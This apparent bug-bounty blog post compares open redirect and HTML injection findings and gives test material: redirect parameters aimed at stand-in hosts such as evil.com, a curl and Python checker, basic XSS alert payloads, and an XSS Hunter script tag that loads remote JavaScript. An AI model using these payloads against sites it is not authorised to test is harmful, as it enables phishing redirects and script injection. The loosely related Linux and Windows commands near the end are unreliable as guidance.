Open Redirect vs HTML Injection: Bug Bounty Insights

By /

Listen to this Post

Featured Image
The discussion revolves around the validity of Open Redirect and HTML Injection vulnerabilities in bug bounty programs, particularly on platforms like HackerOne and Bugcrowd.

Key Points:

  1. Open Redirect is often marked as “Not Applicable” or “Out of Scope” by some programs, but it can still be a valid bug if chained with other vulnerabilities (e.g., phishing attacks).
  2. HTML Injection is generally considered a valid vulnerability across most platforms, especially if it leads to Blind XSS or affects admin panels.

🔗 Reference Report: HackerOne HTML Injection Case

You Should Know:

Testing Open Redirects

To test for Open Redirects, use the following methods:

Manual Testing

Look for URL parameters like:

  • `?redirect=https://evil.com`
    – `?next=//attacker.site`
  • `?url=http://malicious.domain`

Automated Testing with cURL

curl -I "https://target.com/redirect?url=https://evil.com" | grep -i "location:"

Python Script to Check Open Redirects

import requests

url = "https://target.com/redirect" 
params = {"url": "https://evil.com"} 
response = requests.get(url, params=params, allow_redirects=False)

if "location" in response.headers and "evil.com" in response.headers["location"]: 
print("Open Redirect Found!")

Testing HTML Injection

If an endpoint allows HTML Injection, test for XSS or DOM-based attacks.

Basic Payloads

"><script>alert(1)</script> 
<img src=x onerror=alert(1)>

Using Burp Suite

1. Intercept a request containing user input.

2. Inject HTML payloads and observe reflection.

Automated Scanning with XSS Hunter

 Use XSS Hunter payloads to detect blind XSS 
<script src="https://xsshunter.com/xss.js"></script>

What Undercode Say

Open Redirects are often underestimated but can be dangerous when combined with other flaws. HTML Injection, on the other hand, is a more direct threat, especially if it leads to stored XSS or privilege escalation.

Relevant Linux/Windows Commands

  • Linux (Check Network Redirects)
    tcpdump -i eth0 'tcp port 80 and host target.com' -w redirects.pcap
  • Windows (Check URL Handling)
    Get-ChildItem "HKCU:\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice"

Expected Output:

A detailed report on whether the vulnerability is exploitable and its potential impact.

Prediction

As bug bounty programs evolve, Open Redirects may gain more recognition when used in multi-step attacks, while HTML Injection will remain a critical finding due to its direct exploitation potential.

🔗 Further Reading:

References:

Reported By: Raj Dip – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: